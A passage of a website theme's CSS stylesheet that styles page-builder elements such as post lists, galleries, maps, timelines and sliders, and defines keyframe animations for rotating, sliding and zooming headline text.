  z-index: 2;
}
.flex .latest-post .latest-post-item div.img-wrapper >a .caption-category {
  padding: 2px 12px;
  display: table;
  width: auto;
  margin: 8px auto 0;
  background: rgba(255,255,255,0.25);
  border-radius: 4px;
  box-shadow: 0 1px 1px rgba(0,0,0,0.1);
  font-weight: 500;
  font-size: 12px;
  color: #fff;
}
.flex .latest-post .latest-post-item div.img-wrapper >a .caption-category .posted-in {
  opacity: 0.65;
}
.flex .latest-post .latest-post-item div.img-wrapper:hover {
  background: rgba(255,255,255,0.5);
}
.flex .latest-post .latest-post-item div.img-wrapper:hover >a:after {
  opacity: 0.85;
}
.flex .latest-post .latest-post-item div.img-wrapper:hover >a .caption-content {
  opacity: 1;
  transform: translateY(-50%);
}
.flex .latest-post .latest-post-item .latest-post-inner {
  padding: 20px;
  box-shadow: inset 0 0 0px 1px #fff;
  -webkit-transition: 400ms;
  -moz-transition: 400ms;
  -o-transition: 400ms;
  transition: 400ms;
}
.flex .latest-post .latest-post-item .latest-post-inner h2.entry-title {
  font-size: 135%;
  line-height: 1.3;
  margin: 1px 0 12px 0;
}
.flex .latest-post .latest-post-item .latest-post-inner h2.entry-title >a {
  display: block;
}
.flex .latest-post .latest-post-item .latest-post-inner .entry-meta {
  font-weight: 200;
  font-size: 85%;
  margin: 10px 0;
  color: #999;
  -webkit-transition: 400ms;
  -moz-transition: 400ms;
  -o-transition: 400ms;
  transition: 400ms;
}
.flex .latest-post .latest-post-item .latest-post-inner p.intro-text {
  margin: 10px 0 0;
}
.flex .latest-post .latest-post-item .latest-post-inner .post-author {
  font-weight: 500;
  margin: 15px 0 0;
  font-size: 90%;
}
.flex .latest-post .latest-post-item .latest-post-inner .post-author .entry-author {
  color: #999;
}
.flex .latest-post .latest-post-item .latest-post-inner .category {
  color: #999;
  margin: 15px 0 0;
}
.flex .latest-post .latest-post-item .latest-post-inner .category.cat-inline {
  margin: 0 12px;
}
.flex .latest-post .latest-post-item .latest-post-inner .category a {
  font-weight: 600;
}
.flex .latest-post .latest-post-item .latest-post-inner:hover {
  background: #f8f8f8;
}
.flex .latest-post .latest-post-item .latest-post-inner:hover .entry-meta {
  color: #999;
}
.flex .latest-post .latest-post-item .post-divider {
  width: 100%;
  height: 30px;
  display: block;
}
.sppb-divider {
  display: block;
}
.sppb-addon-gallery li img {
  -webkit-transition: all .3s ease-in-out;
  -moz-transition: all .3s ease-in-out;
  -o-transition: all .3s ease-in-out;
  transition: all .3s ease-in-out;
}
.sppb-addon-gallery li:hover img {
  opacity: .8;
}
.sppb-addon-gmap .sppb-addon-content .gm-zoom-in,
.sppb-addon-gmap .sppb-addon-content .gm-zoom-out {
  height: 30px;
  width: 30px;
  border-radius: 3px;
  cursor: pointer;
  margin-left: 10px;
  background-color: rgba(40,40,40,0.25);
  background-repeat: no-repeat;
  background-size: 30px 60px;
  background-image: url(../images/gmap-icon.svg);
  -webkit-transition: all .3s ease-in-out;
  -moz-transition: all .3s ease-in-out;
  -o-transition: all .3s ease-in-out;
  transition: all .3s ease-in-out;
}
.sppb-addon-gmap .sppb-addon-content .gm-zoom-in:hover,
.sppb-addon-gmap .sppb-addon-content .gm-zoom-out:hover {
  background-color: rgba(40,40,40,0.4);
}
.sppb-addon-gmap .sppb-addon-content .gm-zoom-in {
  background-position: 50% 0;
  margin-top: 10px;
  margin-bottom: 2px;
}
.sppb-addon-gmap .sppb-addon-content .gm-zoom-out {
  background-position: 50% -30px;
}
.sppb-addon-gmap .sppb-addon-content .sppb-addon-gmap-canvas {
  background: transparent !important;
}
a[href*="//maps.google.com/maps"],
.gmnoprint a,
.gmnoprint span,
.gm-style-cc {
  display: none !important;
}
.sppb-addon-flickr ul.sppb-flickr-gallery li {
  padding: 5px;
  margin: 0 -0.01%;
}
.sppb-addon-flickr ul.sppb-flickr-gallery li a {
  -webkit-transition: opacity .3s ease-in-out;
  -moz-transition: opacity .3s ease-in-out;
  -o-transition: opacity .3s ease-in-out;
  transition: opacity .3s ease-in-out;
  overflow: hidden;
  padding: 0;
  -webkit-transform: scale(1);
  transform: scale(1);
}
.sppb-addon-flickr ul.sppb-flickr-gallery li a img {
  object-fit: cover;
  padding: 0;
  width: 100%;
  -webkit-transform: scale(1);
  transform: scale(1);
  -webkit-transition: transform .3s ease-in-out;
  -moz-transition: transform .3s ease-in-out;
  -o-transition: transform .3s ease-in-out;
  transition: transform .3s ease-in-out;
}
.sppb-addon-flickr ul.sppb-flickr-gallery li a:hover {
  padding: 0;
  opacity: 0.85;
  -moz-opacity: 0.85;
  -webkit-transform: scale(1);
  transform: scale(1);
}
.sppb-addon-flickr ul.sppb-flickr-gallery li a:hover img {
  -webkit-transform: scale(1.15);
  transform: scale(1.15);
}
.sppb-addon-flickr ul.sppb-flickr-gallery li a:before {
  background: rgba(100,100,100,0.2);
}
.sppb-addon-flickr ul.sppb-flickr-gallery li a:after {
  font-family: "peIcon7";
  content: "\e618";
  font-weight: 600;
  font-size: 32px;
  text-shadow: 1px 1px 2px rgba(0,0,0,0.1);
}
.firefox ul.sppb-flickr-gallery li a img {
  -webkit-transform: scale(1);
  transform: scale(1);
}
.sppb-addon-plyr.minimal .plyr--audio .plyr__controls {
  padding: 0;
  background: transparent;
  border: 0;
  box-shadow: none;
}
.sppb-addon-plyr.minimal .plyr__progress--buffer,
.sppb-addon-plyr.minimal .plyr__progress--played,
.sppb-addon-plyr.minimal .plyr__volume--display {
  height: 4px;
  margin: -2px 0 0;
}
.sppb-addon-plyr.minimal .plyr input[type=range]::-webkit-slider-thumb {
  margin-top: -2px;
  height: 12px;
  width: 12px;
}
.sppb-addon-plyr.minimal .plyr__tooltip {
  margin-bottom: 6px;
}
.sppb-addon-countdown .sppb-countdown-number {
  text-align: center;
  font-weight: normal;
}
.sppb-addon-countdown span.sppb-countdown-text {
  text-align: center;
  margin: 0 auto;
  display: -webkit-box;
  display: -moz-box;
  display: -webkit-flex;
  display: -ms-flexbox;
  display: flex;
  -webkit-box-align: center;
  -webkit-align-items: center;
  -ms-flex-align: center;
  -ms-align-items: center;
  align-items: center;
  -webkit-box-pack: center;
  -webkit-justify-content: center;
  -ms-justify-content: center;
  justify-content: center;
}
.sppb-addon-timeline .sppb-addon-timeline-wrapper:before {
  background-color: #aaa;
  top: 7px;
  bottom: -7px;
  width: 1px;
}
.sppb-addon-timeline .sppb-addon-timeline-wrapper .timeline-badge {
  height: 90px;
  position: absolute;
  left: 50%;
  z-index: 5;
}
.sppb-addon-timeline .sppb-addon-timeline-wrapper .timeline-badge:before {
  font-size: 30px;
  border: 2px solid #aaa;
  height: 16px;
  width: 16px;
  z-index: 1;
}
.sppb-addon-timeline .sppb-addon-timeline-wrapper .timeline-badge:after {
  background: #ddd none repeat scroll 0 0;
  content: "";
  height: 1px;
  left: 0;
  position: absolute;
  top: 37px;
  width: 28px;
}
.sppb-addon-timeline .sppb-addon-timeline-wrapper .odd .timeline-badge:after {
  left: auto;
  height: 1px;
  right: 0;
  top: 44px;
}
.sppb-addon-timeline .sppb-addon-timeline-wrapper .timeline-item .timeline-panel {
  padding: 17px 22px !important;
  text-align: initial;
  border: solid 1px #d0d0d0;
  border-radius: 5px;
  position: relative;
  width: 75vw;
  margin-left: 15px;
}
.sppb-addon-timeline .sppb-addon-timeline-wrapper .timeline-item .timeline-panel .details {
  padding: 0;
  background: transparent;
  border: none;
  -webkit-box-shadow: none;
  box-shadow: none;
}
.sppb-addon-timeline .sppb-addon-timeline-wrapper .timeline-item .timeline-panel.left-part:before {
  top: 34px;
}
select.sppb-form-control:not([size]):not([multiple]) {
  height: 40px;
}
.sppb-form-builder-range-output {
  top: -26px;
  line-height: 21px;
  padding: 0;
}
.sp-slider.sp-basic-slider .sp-item,
.sp-slider.sp-stack-slider .sp-item,
.sp-slider.on-3d-active .sp-item {
  transition-timing-function: cubic-bezier(0.5,0,0.3,1);
  -moz-transition-timing-function: cubic-bezier(0.5,0,0.3,1);
  -webkit-transition-timing-function: cubic-bezier(.0 .5,0,0.3,1);
}
.sp-slider.sp-bubble-slider .sp-item {
  transition-timing-function: ease;
  -moz-transition-timing-function: ease;
  -webkit-transition-timing-function: ease;
}
.sppb-addon-overlay-image .overlay-background-image,
.overlay-image-title,
.overlay-image-title .sppb-addon-subtitle {
  -webkit-transition-timing-function: cubic-bezier(0.45,0,0.3,1);
  -moz-transition-timing-function: cubic-bezier(0.45,0,0.3,1);
  transition-timing-function: cubic-bezier(0.45,0,0.3,1);
  -webkit-transition-duration: .7s;
  -moz-transition-duration: .7s;
  transition-duration: .7s;
}
.animated_headlines .before-text {
  margin-right: .1em;
}
.animated_headlines .after-text {
  margin-left: .1em;
}
.animated_headlines .ah-words-wrapper {
  display: inline-block;
  position: relative;
  text-align: left;
  vertical-align: top;
  margin: 0;
  top: 0;
}
.animated_headlines .ah-words-wrapper b {
  display: inline-block;
  width: auto;
  position: absolute;
  white-space: nowrap;
  left: 0;
  top: 0;
  font-weight: inherit;
}
.animated_headlines .ah-words-wrapper b i {
  font-style: inherit;
}
.animated_headlines .ah-words-wrapper b:before {
  content: '';
  position: relative;
  padding: 0 0 0 0.15em;
}
.animated_headlines .ah-words-wrapper b:after {
  content: '';
  position: relative;
  padding: 0 0.15em 0 0;
}
.animated_headlines .ah-words-wrapper b.is-visible {
  position: relative;
}
.animated_headlines.rotate-1 .ah-words-wrapper {
  -webkit-perspective: 300px;
  -moz-perspective: 300px;
  perspective: 300px;
}
.animated_headlines.rotate-1 b {
  opacity: 0;
  -webkit-transform-origin: 50% 100%;
  -moz-transform-origin: 50% 100%;
  -ms-transform-origin: 50% 100%;
  transform-origin: 50% 100%;
  -webkit-transform: rotateX(180deg);
  -ms-transform: rotateX(180deg);
  -o-transform: rotateX(180deg);
  transform: rotateX(180deg);
}
.animated_headlines.rotate-1 b.is-visible {
  opacity: 1;
  -webkit-transform: rotateX(0deg);
  -ms-transform: rotateX(0deg);
  -o-transform: rotateX(0deg);
  transform: rotateX(0deg);
  -webkit-animation: cd-rotate-1-in 1.2s;
  -o-animation: cd-rotate-1-in 1.2s;
  animation: cd-rotate-1-in 1.2s;
}
.animated_headlines.rotate-1 b.is-hidden {
  -webkit-transform: rotateX(180deg);
  -ms-transform: rotateX(180deg);
  -o-transform: rotateX(180deg);
  transform: rotateX(180deg);
  -webkit-animation: cd-rotate-1-out 1.2s;
  -o-animation: cd-rotate-1-out 1.2s;
  animation: cd-rotate-1-out 1.2s;
}
.animated_headlines.type {
  overflow: hidden;
  -webkit-transition: all .3s ease-in-out;
  -moz-transition: all .3s ease-in-out;
  -o-transition: all .3s ease-in-out;
  transition: all .3s ease-in-out;
  width: auto;
}
.animated_headlines.type .after-text {
  margin-left: .15em;
}
.animated_headlines.type .ah-words-wrapper {
  overflow: hidden;
  width: auto;
  padding: 0 2px;
  -webkit-transition: all .3s ease-in-out;
  -moz-transition: all .3s ease-in-out;
  -o-transition: all .3s ease-in-out;
  transition: all .3s ease-in-out;
}
.animated_headlines.type .ah-words-wrapper i {
  text-indent: 2px;
}
.animated_headlines.type .ah-words-wrapper.waiting::after {
  -webkit-animation: cd-pulse 1s infinite;
  -o-animation: cd-pulse 1s infinite;
  animation: cd-pulse 1s infinite;
}
.animated_headlines.type .ah-words-wrapper.selected {
  background-color: #eee;
}
.animated_headlines.type .ah-words-wrapper.selected::after {
  visibility: hidden;
}
.animated_headlines.type .ah-words-wrapper.selected b {
  color: #0d0d0d;
}
.animated_headlines.type .ah-words-wrapper::after {
  content: '';
  position: absolute;
  right: 0;
  top: 45%;
  bottom: auto;
  height: 90%;
  width: 10px;
  border-right: 2px solid #f14833;
  -webkit-transform: translate(0,-50%);
  -moz-transform: translate(0,-50%);
  -ms-transform: translate(0,-50%);
  -o-transform: translate(0,-50%);
  transform: translate(0,-50%);
}
.animated_headlines.type .ah-words-wrapper b {
  visibility: hidden;
  vertical-align: top;
  -webkit-transition: all .2s ease;
  -moz-transition: all .2s ease;
  -o-transition: all .2s ease;
  transition: all .2s ease;
}
.animated_headlines.type .ah-words-wrapper b.is-visible {
  visibility: visible;
}
.animated_headlines.type .ah-words-wrapper b i {
  position: absolute;
}
.animated_headlines.type .ah-words-wrapper b i.in {
  position: relative;
  visibility: visible;
}
.animated_headlines.type .ah-words-wrapper b:after {
  padding: 0;
}
.animated_headlines.rotate-2 .ah-words-wrapper {
  -webkit-perspective: 300px;
  -moz-perspective: 300px;
  perspective: 300px;
}
.animated_headlines.rotate-2 b {
  opacity: 0;
}
.animated_headlines.rotate-2 i,
.animated_headlines.rotate-2 em {
  display: inline-block;
  -webkit-backface-visibility: hidden;
  -moz-backface-visibility: hidden;
  backface-visibility: hidden;
}
.animated_headlines.rotate-2 i {
  -webkit-transform-style: preserve-3d;
  -moz-transform-style: preserve-3d;
  -ms-transform-style: preserve-3d;
  -o-transform-style: preserve-3d;
  transform-style: preserve-3d;
  -webkit-transform: translateZ(-20px) rotateX(90deg);
  -moz-transform: translateZ(-20px) rotateX(90deg);
  -ms-transform: translateZ(-20px) rotateX(90deg);
  -o-transform: translateZ(-20px) rotateX(90deg);
  transform: translateZ(-20px) rotateX(90deg);
  opacity: 0;
}
.animated_headlines.rotate-2 i.in {
  -webkit-animation: cd-rotate-2-in 0.4s forwards;
  -o-animation: cd-rotate-2-in 0.4s forwards;
  animation: cd-rotate-2-in 0.4s forwards;
}
.animated_headlines.rotate-2 i.out {
  -webkit-animation: cd-rotate-2-out 0.4s forwards;
  -o-animation: cd-rotate-2-out 0.4s forwards;
  animation: cd-rotate-2-out 0.4s forwards;
}
.animated_headlines.rotate-2.is-visible i {
  opacity: 1;
}
.animated_headlines.rotate-2 em {
  display: inline-block;
  -webkit-transform: translate3d(0,0,20px);
  -moz-transform: translate3d(0,0,20px);
  -ms-transform: translate3d(0,0,20px);
  -o-transform: translate3d(0,0,20px);
  transform: translate3d(0,0,20px);
}
.animated_headlines.loading-bar span {
  display: inline-block;
}
.animated_headlines.loading-bar .ah-words-wrapper {
  overflow: hidden;
}
.animated_headlines.loading-bar .ah-words-wrapper::after {
  content: '';
  position: absolute;
  left: 0.02em;
  bottom: 0;
  height: 3px;
  width: 0;
  background-color: #f14833;
  z-index: 2;
  -webkit-transition: width 0.3s -0.2s ease;
  -moz-transition: width 0.3s -0.2s ease;
  -o-transition: width 0.3s -0.2s ease;
  transition: width 0.3s -0.2s ease;
}
.animated_headlines.loading-bar .ah-words-wrapper.is-loading::after {
  width: 100%;
  -webkit-transition: width 3s ease;
  -moz-transition: width 3s ease;
  -o-transition: width 3s ease;
  transition: width 3s ease;
}
.animated_headlines.loading-bar b {
  top: 0;
  opacity: 0;
  visibility: hidden;
  -webkit-transform: translate(-115%,0);
  -moz-transform: translate(-115%,0);
  -ms-transform: translate(-115%,0);
  -o-transform: translate(-115%,0);
  transform: translate(-115%,0);
  -webkit-transition: all 0.7s cubic-bezier(0.350,0,0.3,1.1);
  -moz-transition: all 0.7s cubic-bezier(0.350,0,0.3,1.1);
  -o-transition: all 0.7s cubic-bezier(0.350,0,0.3,1.1);
  transition: all 0.7s cubic-bezier(0.350,0,0.3,1.1);
}
.animated_headlines.loading-bar b.is-visible {
  opacity: 1;
  top: 0;
  visibility: visible;
  -webkit-transform: translate(0,0);
  -moz-transform: translate(0,0);
  -ms-transform: translate(0,0);
  -o-transform: translate(0,0);
  transform: translate(0,0);
}
.animated_headlines.slide span {
  display: inline-block;
}
.animated_headlines.slide .ah-words-wrapper {
  overflow: hidden;
  vertical-align: top;
}
.animated_headlines.slide .ah-words-wrapper b {
  opacity: 0;
  top: .2em;
}
.animated_headlines.slide .ah-words-wrapper b.is-visible {
  top: 0;
  opacity: 1;
  -webkit-animation: slide-in 0.6s;
  -o-animation: slide-in 0.6s;
  animation: slide-in 0.6s;
}
.animated_headlines.slide .ah-words-wrapper b.is-hidden {
  -webkit-animation: slide-out 0.6s;
  -o-animation: slide-out 0.6s;
  animation: slide-out 0.6s;
}
.animated_headlines.clip span {
  display: inline-block;
}
.animated_headlines.clip .ah-words-wrapper {
  overflow: hidden;
  margin: 0 1px;
}
.animated_headlines.clip .ah-words-wrapper::after {
  content: '';
  position: absolute;
  top: 0;
  right: 0;
  width: 3px;
  height: 99%;
  background-color: #f14833;
}
.animated_headlines.clip b {
  opacity: 0;
  padding: 0 3px 0 0;
  line-height: 1.4;
}
.animated_headlines.clip b.is-visible {
  opacity: 1;
}
.animated_headlines.reset-width span {
  display: inline-block;
}
.animated_headlines.reset-width .ah-words-wrapper {
  overflow: hidden;
  margin: 0;
  top: 0;
}
.animated_headlines.zoom .ah-words-wrapper {
  -webkit-perspective: 400px;
  -moz-perspective: 400px;
  perspective: 400px;
}
.animated_headlines.zoom b {
  opacity: 0;
}
.animated_headlines.zoom b.is-visible {
  opacity: 1;
  -webkit-animation: zoom-in .8s ease-in-out;
  -o-animation: zoom-in .8s ease-in-out;
  animation: zoom-in .8s ease-in-out;
}
.animated_headlines.zoom b.is-hidden {
  -webkit-animation: zoom-out .8s ease;
  -o-animation: zoom-out .8s ease;
  animation: zoom-out .8s ease;
}
.animated_headlines.rotate-3 .ah-words-wrapper {
  -webkit-perspective: 300px;
  -moz-perspective: 300px;
  perspective: 300px;
}
.animated_headlines.rotate-3 b {
  opacity: 0;
}
.animated_headlines.rotate-3 i {
  display: inline-block;
  -webkit-transform: rotateY(180deg);
  -ms-transform: rotateY(180deg);
  -o-transform: rotateY(180deg);
  transform: rotateY(180deg);
  -webkit-backface-visibility: hidden;
  -moz-backface-visibility: hidden;
  backface-visibility: hidden;
}
.animated_headlines.rotate-3 i.in {
  -webkit-animation: cd-rotate-3-in 0.6s forwards;
  -o-animation: cd-rotate-3-in 0.6s forwards;
  animation: cd-rotate-3-in 0.6s forwards;
}
.animated_headlines.rotate-3 i.out {
  -webkit-animation: cd-rotate-3-out 0.6s forwards;
  -o-animation: cd-rotate-3-out 0.6s forwards;
  animation: cd-rotate-3-out 0.6s forwards;
}
.animated_headlines.scale b {
  opacity: 0;
}
.animated_headlines.scale i {
  display: inline-block;
  opacity: 0;
  -webkit-transform: scale(0);
  -moz-transform: scale(0);
  -ms-transform: scale(0);
  -o-transform: scale(0);
  transform: scale(0);
}
.animated_headlines.scale i.in {
  -webkit-animation: scale-up 0.6s forwards;
  -o-animation: scale-up 0.6s forwards;
  animation: scale-up 0.6s forwards;
}
.animated_headlines.scale i.out {
  -webkit-animation: scale-down 0.6s forwards;
  -o-animation: scale-down 0.6s forwards;
  animation: scale-down 0.6s forwards;
}
.animated_headlines.push b {
  opacity: 0;
}
.animated_headlines.push b.is-visible {
  opacity: 1;
  -webkit-animation: push-in 1s cubic-bezier(0.150,0,0.300,1.050);
  -o-animation: push-in 1s cubic-bezier(0.150,0,0.300,1.050);
  animation: push-in 1s cubic-bezier(0.150,0,0.300,1.050);
}
.animated_headlines.push b.is-hidden {
  -webkit-animation: push-out 1s cubic-bezier(0.150,0,0.300,1.050);
  -o-animation: push-out 1s cubic-bezier(0.150,0,0.300,1.050);
  animation: push-out 1s cubic-bezier(0.150,0,0.300,1.050);
}
.no-csstransitions .animated_headlines.rotate-2 i {
  -webkit-transform: rotateX(0deg);
  -ms-transform: rotateX(0deg);
  -o-transform: rotateX(0deg);
  transform: rotateX(0deg);
  opacity: 0;
}
.no-csstransitions .animated_headlines.rotate-2 i em {
  -webkit-transform: scale(1);
  -moz-transform: scale(1);
  -ms-transform: scale(1);
  -o-transform: scale(1);
  transform: scale(1);
}
@-webkit-keyframes cd-rotate-1-in {
  0% {
    -webkit-transform: rotateX(180deg);
    opacity: 0;
  }
  35% {
    -webkit-transform: rotateX(120deg);
    opacity: 0;
  }
  65% {
    opacity: 0;
  }
  100% {
    -webkit-transform: rotateX(360deg);
    opacity: 1;
  }
}
@keyframes cd-rotate-1-in {
  0% {
    -webkit-transform: rotateX(180deg);
    -ms-transform: rotateX(180deg);
    -o-transform: rotateX(180deg);
    transform: rotateX(180deg);
    opacity: 0;
  }
  35% {
    -webkit-transform: rotateX(120deg);
    -ms-transform: rotateX(120deg);
    -o-transform: rotateX(120deg);
    transform: rotateX(120deg);
    opacity: 0;
  }
  65% {
    opacity: 0;
  }
  100% {
    -webkit-transform: rotateX(360deg);
    -ms-transform: rotateX(360deg);
    -o-transform: rotateX(360deg);
    transform: rotateX(360deg);
    opacity: 1;
  }
}
@-webkit-keyframes cd-rotate-1-out {
  0% {
    -webkit-transform: rotateX(0deg);
    opacity: 1;
  }
  35% {
    -webkit-transform: rotateX(-40deg);
    opacity: 1;
  }
  65% {
    opacity: 0;
  }
  100% {
    -webkit-transform: rotateX(180deg);
    opacity: 0;
  }
}
@keyframes cd-rotate-1-out {
  0% {
    -webkit-transform: rotateX(0deg);
    -ms-transform: rotateX(0deg);
    -o-transform: rotateX(0deg);
    transform: rotateX(0deg);
    opacity: 1;
  }
  35% {
    -webkit-transform: rotateX(-40deg);
    -ms-transform: rotateX(-40deg);
    -o-transform: rotateX(-40deg);
    transform: rotateX(-40deg);
    opacity: 1;
  }
  65% {
    opacity: 0;
  }
  100% {
    -webkit-transform: rotateX(180deg);
    -ms-transform: rotateX(180deg);
    -o-transform: rotateX(180deg);
    transform: rotateX(180deg);
    opacity: 0;
  }
}
@-webkit-keyframes cd-pulse {
  0% {
    -webkit-transform: translateY(-50%) scale(1);
    opacity: 1;
  }
  40% {
    -webkit-transform: translateY(-50%) scale(0.9);
    opacity: 0;
  }
  100% {
    -webkit-transform: translateY(-50%) scale(0);
    opacity: 0;
  }
}
@keyframes cd-pulse {
  0% {
    -webkit-transform: translateY(-50%) scale(1);
    -moz-transform: translateY(-50%) scale(1);
    -ms-transform: translateY(-50%) scale(1);
    -o-transform: translateY(-50%) scale(1);
    transform: translateY(-50%) scale(1);
    opacity: 1;
  }
  40% {
    -webkit-transform: translateY(-50%) scale(0.9);
    -moz-transform: translateY(-50%) scale(0.9);
    -ms-transform: translateY(-50%) scale(0.9);
    -o-transform: translateY(-50%) scale(0.9);
    transform: translateY(-50%) scale(0.9);
    opacity: 0;
  }
  100% {
    -webkit-transform: translateY(-50%) scale(0);
    -moz-transform: translateY(-50%) scale(0);
    -ms-transform: translateY(-50%) scale(0);
    -o-transform: translateY(-50%) scale(0);
    transform: translateY(-50%) scale(0);
    opacity: 0;
  }
}
@-webkit-keyframes cd-rotate-2-in {
  0% {
    opacity: 0;
    -webkit-transform: translateZ(-20px) rotateX(90deg);
  }
  60% {
    opacity: 1;
    -webkit-transform: translateZ(-20px) rotateX(-10deg);
  }
  100% {
    opacity: 1;
    -webkit-transform: translateZ(-20px) rotateX(0deg);
  }
}
@keyframes cd-rotate-2-in {
  0% {
    opacity: 0;
    -webkit-transform: translateZ(-20px) rotateX(90deg);
    -moz-transform: translateZ(-20px) rotateX(90deg);
    -ms-transform: translateZ(-20px) rotateX(90deg);
    -o-transform: translateZ(-20px) rotateX(90deg);
    transform: translateZ(-20px) rotateX(90deg);
  }
  60% {
    opacity: 1;
    -webkit-transform: translateZ(-20px) rotateX(-10deg);
    -moz-transform: translateZ(-20px) rotateX(-10deg);
    -ms-transform: translateZ(-20px) rotateX(-10deg);
    -o-transform: translateZ(-20px) rotateX(-10deg);
    transform: translateZ(-20px) rotateX(-10deg);
  }
  100% {
    opacity: 1;
    -webkit-transform: translateZ(-20px) rotateX(0deg);
    -moz-transform: translateZ(-20px) rotateX(0deg);
    -ms-transform: translateZ(-20px) rotateX(0deg);
    -o-transform: translateZ(-20px) rotateX(0deg);
    transform: translateZ(-20px) rotateX(0deg);
  }
}
@-webkit-keyframes cd-rotate-2-out {
  0% {
    opacity: 1;
    -webkit-transform: translateZ(-20px) rotateX(0);
  }
  60% {
    opacity: 0;
    -webkit-transform: translateZ(-20px) rotateX(-100deg);
  }
  100% {
    opacity: 0;
    -webkit-transform: translateZ(-20px) rotateX(-90deg);
  }
}
@keyframes cd-rotate-2-out {
  0% {
    opacity: 1;
    -webkit-transform: translateZ(-20px) rotateX(0);
    -moz-transform: translateZ(-20px) rotateX(0);
    -ms-transform: translateZ(-20px) rotateX(0);
    -o-transform: translateZ(-20px) rotateX(0);
    transform: translateZ(-20px) rotateX(0);
  }
  60% {
    opacity: 0;
    -webkit-transform: translateZ(-20px) rotateX(-100deg);
    -moz-transform: translateZ(-20px) rotateX(-100deg);
    -ms-transform: translateZ(-20px) rotateX(-100deg);
    -o-transform: translateZ(-20px) rotateX(-100deg);
    transform: translateZ(-20px) rotateX(-100deg);
  }
  100% {
    opacity: 0;
    -webkit-transform: translateZ(-20px) rotateX(-90deg);
    -moz-transform: translateZ(-20px) rotateX(-90deg);
    -ms-transform: translateZ(-20px) rotateX(-90deg);
    -o-transform: translateZ(-20px) rotateX(-90deg);
    transform: translateZ(-20px) rotateX(-90deg);
  }
}
@-webkit-keyframes slide-in {
  0% {
    opacity: 0;
    -webkit-transform: translateY(-100%);
  }
  60% {
    opacity: 1;
    -webkit-transform: translateY(20%);
  }
  100% {
    opacity: 1;
    -webkit-transform: translateY(0);
  }
}
@keyframes slide-in {
  0% {
    opacity: 0;
    -webkit-transform: translateY(-100%);
    -moz-transform: translateY(-100%);
    -ms-transform: translateY(-100%);
    -o-transform: translateY(-100%);
    transform: translateY(-100%);
  }
  60% {
    opacity: 1;
    -webkit-transform: translateY(20%);
    -moz-transform: translateY(20%);
    -ms-transform: translateY(20%);
    -o-transform: translateY(20%);
    transform: translateY(20%);
  }
  100% {
    opacity: 1;
    -webkit-transform: translateY(0);
    -moz-transform: translateY(0);
    -ms-transform: translateY(0);
    -o-transform: translateY(0);
    transform: translateY(0);
  }
}
@-webkit-keyframes slide-out {
  0% {
    opacity: 1;
    -webkit-transform: translateY(0);
  }
  60% {
    opacity: 0;
    -webkit-transform: translateY(120%);
  }
  100% {
    opacity: 0;
    -webkit-transform: translateY(100%);
  }
}
@keyframes slide-out {
  0% {
    opacity: 1;
    -webkit-transform: translateY(0);
    -moz-transform: translateY(0);
    -ms-transform: translateY(0);
    -o-transform: translateY(0);
    transform: translateY(0);
  }
  60% {
    opacity: 0;
    -webkit-transform: translateY(120%);
    -moz-transform: translateY(120%);
    -ms-transform: translateY(120%);
    -o-transform: translateY(120%);
    transform: translateY(120%);
  }
  100% {
    opacity: 0;
    -webkit-transform: translateY(100%);
    -moz-transform: translateY(100%);
    -ms-transform: translateY(100%);
    -o-transform: translateY(100%);
    transform: translateY(100%);
  }
}
@-webkit-keyframes zoom-in {
  0% {
    opacity: 0;
    -webkit-transform: translateZ(120px) scale(1.2);
  }
  100% {
    opacity: 1;
    -webkit-transform: translateZ(0) scale(1);
  }
}
@keyframes zoom-in {
  0% {
    opacity: 0;
    -webkit-transform: translateZ(120px) scale(1.2);
    -moz-transform: translateZ(120px) scale(1.2);
    -ms-transform: translateZ(120px) scale(1.2);
    -o-transform: translateZ(120px) scale(1.2);
    transform: translateZ(120px) scale(1.2);
  }
  100% {
    opacity: 1;
    -webkit-transform: translateZ(0) scale(1);
    -moz-transform: translateZ(0) scale(1);
    -ms-transform: translateZ(0) scale(1);
    -o-transform: translateZ(0) scale(1);
    transform: translateZ(0) scale(1);
  }
}
@-webkit-keyframes zoom-out {
  0% {
    opacity: 1;
    -webkit-transform: translateZ(0);
  }
  100% {
    opacity: 0;
    -webkit-transform: translateZ(-60px);
  }
}
@keyframes zoom-out {
  0% {
    opacity: 1;
    -webkit-transform: translateZ(0) scale(1);
    -moz-transform: translateZ(0) scale(1);
    -ms-transform: translateZ(0) scale(1);
    -o-transform: translateZ(0) scale(1);
    transform: translateZ(0) scale(1);
  }
  100% {
    opacity: 0;
    -webkit-transform: translateZ(-60px) scale(0.8);
    -moz-transform: translateZ(-60px) scale(0.8);
    -ms-transform: translateZ(-60px) scale(0.8);
    -o-transform: translateZ(-60px) scale(0.8);
    transform: translateZ(-60px) scale(0.8);
  }
}
@-webkit-keyframes cd-rotate-3-in {
  0% {
    -webkit-transform: rotateY(180deg);
  }
  100% {
    -webkit-transform: rotateY(0deg);
  }
}
@keyframes cd-rotate-3-in {
  0% {
    -webkit-transform: rotateY(180deg);
    -ms-transform: rotateY(180deg);
    -o-transform: rotateY(180deg);
    transform: rotateY(180deg);
  }
  100% {
    -webkit-transform: rotateY(0deg);
    -ms-transform: rotateY(0deg);
    -o-transform: rotateY(0deg);
    transform: rotateY(0deg);
  }
}
@-webkit-keyframes cd-rotate-3-out {
  0% {
    -webkit-transform: rotateY(0);
  }
  100% {
    -webkit-transform: rotateY(-180deg);
  }
}
@keyframes cd-rotate-3-out {
  0% {
    -webkit-transform: rotateY(0deg);
    -ms-transform: rotateY(0deg);
    -o-transform: rotateY(0deg);
    transform: rotateY(0deg);
  }
  100% {
    -webkit-transform: rotateY(-180deg);
    -ms-transform: rotateY(-180deg);
    -o-transform: rotateY(-180deg);
    transform: rotateY(-180deg);
  }
}
@-webkit-keyframes scale-up {
  0% {
    -webkit-transform: scale(0);
    opacity: 0;
  }
  60% {
    -webkit-transform: scale(1.2);
    opacity: 1;
  }
  100% {
    -webkit-transform: scale(1);
    opacity: 1;
  }
}
@keyframes scale-up {
  0% {
    -webkit-transform: scale(0);
    -moz-transform: scale(0);
    -ms-transform: scale(0);
    -o-transform: scale(0);
    transform: scale(0);
    opacity: 0;
  }
  60% {
    -webkit-transform: scale(1.2);
    -moz-transform: scale(1.2);
    -ms-transform: scale(1.2);
    -o-transform: scale(1.2);
    transform: scale(1.2);
    opacity: 1;
  }
  100% {
    -webkit-transform: scale(1);
    -moz-transform: scale(1);
    -ms-transform: scale(1);
    -o-transform: scale(1);
    transform: scale(1);
    opacity: 1;
  }
}
@-webkit-keyframes scale-down {
  0% {
    -webkit-transform: scale(1);
    opacity: 1;
  }
  60% {
    -webkit-transform: scale(0);
    opacity: 0;
  }
}
